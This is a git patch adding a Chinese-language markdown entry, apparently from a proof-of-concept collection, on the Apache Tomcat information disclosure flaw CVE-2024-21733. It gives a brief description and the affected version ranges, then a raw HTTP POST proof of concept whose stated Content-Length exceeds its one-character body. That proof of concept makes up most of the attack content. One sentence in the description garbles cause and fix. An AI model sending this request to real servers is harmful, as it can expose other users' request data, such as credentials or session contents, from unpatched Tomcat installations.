From 2e13e83ff6f380cae7b36d9942fc921bc614451d Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 1 Feb 2024 13:52:11 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Apache=20Tomcat=E5=AD=98=E5=9C=A8?=
 =?UTF-8?q?=E4=BF=A1=E6=81=AF=E6=B3=84=E9=9C=B2=E6=BC=8F=E6=B4=9E(=20CVE-2?=
 =?UTF-8?q?024-21733).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...Tomcat存在信息泄露漏洞( CVE-2024-21733).md | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md

diff --git a/Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md b/Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md
new file mode 100644
index 0000000..b4a6dbd
--- /dev/null
+++ b/Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md	
@@ -0,0 +1,38 @@
+## Apache Tomcat存在信息泄露漏洞( CVE-2024-21733)
+
+2024年1月25日公司监测到Apache Tomcat 信息泄露漏洞（CVE-2024-21733）情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器，用于运行 Java 应用程序和动态网页。Coyote 是 Tomcat 的连接器，处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求，在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态，从而造成信息泄露。
+
+
+## 影响版本
+```
+从8.5.7到8.5.63
+9.0.0-M11到9.0.43
+```
+
+
+## poc
+```
+POST / HTTP/1.1
+Host: hostname
+Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Linux"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Priority: u=0, i
+Connection: keep-alive
+Content-Length: 6
+Content-Type: application/x-www-form-urlencoded
+
+X
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/15933e83-bb51-4d91-ba49-c31ab8d27cdb)
+